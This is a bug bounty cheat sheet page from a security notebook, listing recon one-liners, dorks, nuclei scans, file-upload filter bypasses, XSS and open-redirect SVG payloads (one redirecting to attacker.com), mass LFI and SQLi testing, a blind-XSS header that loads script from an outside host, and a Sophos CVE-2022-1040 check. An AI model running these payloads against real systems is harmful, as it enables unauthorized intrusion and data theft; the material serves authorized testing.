Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  1. Notes
  2. Security Research

Bug Bounty

PreviousGithub DorksNextBug Bounty Programs

Last updated 6 months ago

Custom Header Setup

Steps to Add Custom Header in Burp Requests

  • Select Proxy -> Options

  • Go to Match and Replace and select add

  • Specify the details of the match and replace as shown below

    1. Type: Request Header

    2. Match: Leave blank to add a new header

    3. Replace: hacker@bugbounty.site

    4. Comment: Manually BBP header

Information Gathering

- often blocked by organizations for gray hat searches - scans less frequently than LeakIX but whitelisted - best overall scanner but without vulnerability discovery - Real-time Recon/DNS data for Public Bug Bounty Programs - automated recon and vulnerability scanner - tool used to discover exposed hosts on the internet using multiple search engines - Active Reconnaissance Tool - collection of bash and python scripts that installs common tools for recon scans and asset discovery

- Security check scanner that is based on templates; Get started with Nuclei - Visually navigate available nuclei templates - collect and organize other custom templates

Getting started with some CVE scanning using Nuclei templates:

nuclei -target "https://site.com" -t cves
nuclei -target "https://site.com" -t /path/to/nuclei-templates/cves
nuclei -target "https://site.com" -t cves -rl

Mass security testing on subdomains:

cat site subdomains.txt | nuclei -t /path/to/nuclei-templates/
nuclei -t /path/to/nuclei-templates/ -l urls.txt

-rl, -rate-limit int maximum number of requests to send per second (default 150)

-rlm, -rate-limit-minute int maximum number of requests to send per minute

Combining nuclei scanner with CENT custom templates

nuclei -u https://example.com -t ./cent-nuclei-templates -tags cve
nuclei -l urls.txt -t ./cent-nuclei-templates -tags cve
Google Dork
Purpose

intitle:"index of /.git/"

Searching for Directories

allintext:index filetype:git

Search for extensions

inurl:"index.php?id="

Searching for PHP pages

inurl:"admin/dashboard.php" site:.com

Searching for PHP admin dashboards

Intitle: "login" "admin" site:http://site.com

Searching for admin login pages

intitle:"Index of /" .htaccess site:http://site.com

Searching for exposed Apache configuration file

site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"

Searching for possible contact form

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com

SSRF Prone Parameters

Shodan Dork
Purpose

hostname:".gov" product:"Jenkins" 200

Searching Jenkins instances in .gov

ssl.cert.subject.CN:"*.google.com"+200

Returns all SSL services that has issued a certificate for *.google.com with an HTTP response code of 200.

ssl.cert.issuer.cn:"DOD SW CA-60" 200

Returns all SSL certificates that have been issued by the DoD with response code of 200

Defense Evasion

Attempt to bypass application protections such as Cloudflare, Akamai, etc.

Check to see if application is behind a WAF

wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL

Authentication:

Registration

  • Input validation

  • Analysis

  • Misc

  • Password reset process

    • Password reset tokens (expiration/reuse)

  • Failed retry lockout (DoS)

  • Password policies

  • Update profile information without asking password

  • Default or easy to guess keys

  • User enumeration

  • HTTP Authentication

  • Authentication Bypass

  • Identify weak authentication channels (Find primary mechanism and identify secondary mechanicsm / methods [Mobile App, Call Center, SSO])

Authorization:

Session:

General:

File Upload:

  • Extensions Impact

    • ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE

    • SVG: Stored XSS, SSRF, XXE

    • GIF: Stored XSS, SSRF

    • CSV: CSV injection

    • XML: XXE

    • AVI: LFI, SSRF

    • HTML, JS : HTML injection, XSS, Open redirect

    • PNG, JPEG: Pixel flood attack (DoS)

    • ZIP: RCE via LFI, DoS

    • PDF, PPTX: SSRF, BLIND XXE

  • Blacklisting Bypass

    • PHP → .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc

    • ASP → asp, .aspx, .cer, .asa

    • Jsp → .jsp, .jspx, .jsw, .jsv, .jspf

    • Coldfusion → .cfm, .cfml, .cfc, .dbm

    • Using random capitalization → .pHp, .pHP5, .PhAr

  • Whitelisting Bypass

    • file.jpg.php

    • file.php.jpg

    • file.php.blah123jpg

    • file.php%00.jpg

    • file.php\x00.jpg this can be done while uploading the file too, name it file.phpD.jpg and change the D (44) in hex to 00.

    • file.php%00

    • file.php%20

    • file.php%0d%0a.jpg

    • file.php.....

    • file.php/

    • file.php.\

    • file.php#.png

    • file.

    • .html

Vulnerabilities

XSS

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open Redirect

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

Adobe Experience Manager (AEM) Configuration Testing

Shodan Dork:

http.component:"Adobe Experience Manager"

Reporting

Recon

HackerOne Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Dump list of all BBP Domains that are in scope and identify those without dns names (ips.txt)

curl -sL https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/domains.txt > domains.txt && grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' domains.txt > ips.txt

Martian Grip

shodan download testing 'cloud.region:"us-east-1" 200 product:"Elastic" port:8001'; shodan parse --fields ip_str,port testing.json.gz | tee testing_parsed.out | awk '{print$1":"$2}' | httpx -silent -o testing_httpx.out | nuclei -as -silent -o testing_nuclei.out; cat testing_nuclei.out | awk -F " " '{print $6}' | grip | uniq -u | tee testing_vuln_ips.out | nrich - | tee testing_nrich.out
  • The shodan download command is attempting to search for devices in the US East (N. Virginia) region that have a product named "Elastic" and are listening on port 8001. The parse command is used to extract certain fields (in this case, ip_str and port) from the results of the search, which are stored in the file testing.json.gz.

  • httpx is a tool that can be used to perform HTTP requests and analyze the response. In this case, the command is using the -silent flag to suppress output and the -o flag to write the response to a file called testing_httpx.out. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results.

  • awk is a tool for processing text files. The command appears to be extracting the sixth field ($6) from the output of the nuclei command, which is piped (|) to the grip command.

  • grip is a command line tool for rendering local readme files before sending them to GitHub. In this case, it is used to render the output of the awk command, which is then passed to uniq with the -u flag to remove duplicate lines. The resulting list of unique lines is written to the file testing_vuln_ips.out.

Find SQLi at scale

# collect target urls \ `subfinder -d site.com -silent - all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a urls`\ # filter potential SQLi Url cat urls | gf sqli | tee -a sqli `` # run test while read line; do sqlmap -u $line --parse-errors --curent-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < sqli

Local File Inclusion

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎 𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜

cat domains.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

Unauthenticated Blind SSRF via xmlrpc.php

cat iplist| httpx -silent -path /xmlrpc.php -title -match-string "XML-RPC"

Find JavaScript Files

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

Extract Endpoints from JavaScript

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Org Information from Target Lists

for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

Finding Subdomains

Get Subdomains from RapidDNS.io

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run

curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

Get Subdomains from Riddler.io

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

Get Subdomains from CertSpotter

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from Archive

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

Bruteforcing Subdomain using DNS Over

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

Get Subdomains With sonar.omnisint.io

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains With synapsint.com

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains from crt.sh

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

Discover subdomains and enumerate API endpoints discovered with subfinder

subfinder -d host.com -silent -all | httpx -silent -o host.txt; for i in $(cat host_httpx.txt); do DOMAIN=$(echo $i | unfurl format %d); ffuf -u $i/FUZZ -w common-api-endpoints.txt -o ${DOMAIN]_ffuf.txt; done

Subdomain Bruteforcer with FFUF

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find Allocated IP Ranges for ASN from IP Address

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

CVE 2022-1040 (Give your domain without http/https on the "sophos_servers" file)

cat sophos_servers | while read host do; do curl --connect-timeout 10 -ks -H "X-Requested-With: XMLHttpRequest" -X POST "https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"👽":"TEST"\}" | grep -q 'Session Expired' && printf "$host \033[1;41mVulnerable [ Sophos RCE ]\e[0m\n"; done;

General

Use grep 𝐭𝐨 𝗘𝘅𝘁𝗿𝗮𝗰𝘁 𝗨𝗥𝗟'𝘀 𝗳𝗿𝗼𝗺 𝗷𝘂𝗻𝗸 𝗱𝗮𝘁𝗮

  • From a local file

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
  • From an online resource

curl http://site.xxx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

Techniques/Checklist

JS File Analysis

2FA Code Leakage in Response

Lack of brute-Force Protection

2FA Refer Check Bypass

Missing 2FA Code Integrity Validation

Enabling 2FA Doesn’t Expire Previous Session

Clickjacking on 2FA Disable Feature

Response Manipulation

Status Code Manipulation

2FA Code Reusability

CSRF on 2FA Disable Feature

CloudFront

Bypassing Cloudfront XSS WAF

  1. alert = window["al"+"ert"]

  2. bypass () with ``

  3. replace space with /

  4. encode symbols:

Remote Code Execution Parameters ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload} ?cmd={payload} ?exec={payload} ?command={payload} ?execute={payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload}

Git

/.git

/.gitkeep

/.git-rewrite

/.gitreview

/.git/HEAD

/.gitconfig

/.git/index

/.git/logs

/.svnignore

/.gitattributes

/.gitmodules

/.svn/entries

Daily updated Text file of all domains within scope on active Bug Bounty Programs

Sensitive Information Exposure methods Use gitdumper.sh or

Worth a shot to use the tool by by @

Convert JWT to a format crackable by John python3

/ aws s3 cp test.txt s3://target --no-sign-request aws s3 ls s3://target --no-sign-request

****

Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from and steal information of every visitor.

Resources

Dump In-scope Assets from BBPs using repo from

from with beginner explanation

`` is a tool for detecting vulnerabilities and misconfigurations in web applications. The -as flag stands for "active scan", which means that the tool will perform various types of requests to the target web application in order to identify potential vulnerabilities. The -silent flag suppresses output, and the -o flag specifies an output file for the results. The input for this command is the list of IP addresses and ports extracted from the Shodan search results.

is a tool for performing OSINT (Open Source Intelligence) on IP addresses. The input for this command appears to be the list of IP addresses and ports extracted from the Shodan search results, and the - flag tells the tool to read the input from standard input (stdin). The results are written to the file testing_nrich.out.

LeakIX
Shodan
Censys
Chaos.ProjectDiscovery
Search Engine Dorking
ReconFTW
Uncover
PrettyRecon
BountyStrike
Nuclei
here
Nuclei Templates Directory
Community edition nuclei templates (CENT)
https://github.com/arkadiyt/bounty-targets-data/blob/main/data/domains.txt
GitTools
gittyleaks
Cloudflare Origin IP
gwen001
c-jwt-cracker
jwt_tool
JWT2John
jwt2john.py
lazys3
AWS Cli
http://bucket.s3.amazonaws.com
http://s3.amazonaws.com/bucket
Metadata Cloud
How the AWS Access Key & Secret works
IPlogger
Swagger UI XSS
AEM Hacker Tool
SlideShare presentation on AEM by 0ang3el
CVSS 3.1 Calculator
@arkadiyt
@notnci
nuclei
nrich